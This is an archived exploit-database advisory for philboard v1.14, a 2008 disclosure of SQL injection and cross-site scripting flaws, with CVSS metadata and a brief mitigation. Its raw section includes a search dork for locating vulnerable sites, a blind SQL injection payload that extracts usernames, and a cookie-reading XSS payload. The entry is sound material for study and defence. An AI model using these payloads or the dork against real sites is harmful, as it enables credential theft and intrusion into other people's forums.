philboard v 1.14 Multiple Remote Exploits

vendor:

philboard

by:

Bl@ckbe@rD ('Tunisian TerrorisT')

9.3

CVSS

HIGH

Remote SQL Injection and Remote XSS Exploit

89, 79

CWE

Product Name: philboard

Affected Version From: 1.14

Affected Version To: 1.14

Patch Exists: YES

Related CWE: N/A

CPE: a:philboard:philboard:1.14

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

philboard v 1.14 Multiple Remote Exploits

A remote SQL injection vulnerability exists in philboard v 1.14. An attacker can exploit this vulnerability to inject arbitrary SQL commands and execute them in the backend database. A remote XSS exploit also exists in philboard v 1.14. An attacker can exploit this vulnerability to inject arbitrary JavaScript code and execute it in the user's browser.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

> [+] Script Name     : philboard v 1.14 Multiple Remote Exploits

> |+| Team            : InjEct0r5

> [+] Author          : Bl@ckbe@rD ('Tunisian TerrorisT') ;

> [+] Contact         : blackbeard-sql[A.T]hotmail{.}fr ;

> [+] Dork            : Powered by v1.14 powered by philboard v1.14

> --//-->

> [+] Expl0iT :

> Remote SQL Injection :

> __--> http://www.dork.cc/[ScriptPath]/forum.asp?forumid=[SQL]

> Blind Way  : IIF((select%20mid(last(username),1,1)%20from%20(select%20top%2010%20username%20from%20users))='a',0,'Bingo')%00

> Remote XSS Exploit :

> __--> http://www.dork.co.il/[Script Path]/search.asp?searchterms=[XSS]

[XSS] --> <script>alert(document.cookie)</script>

# milw0rm.com [2008-06-27]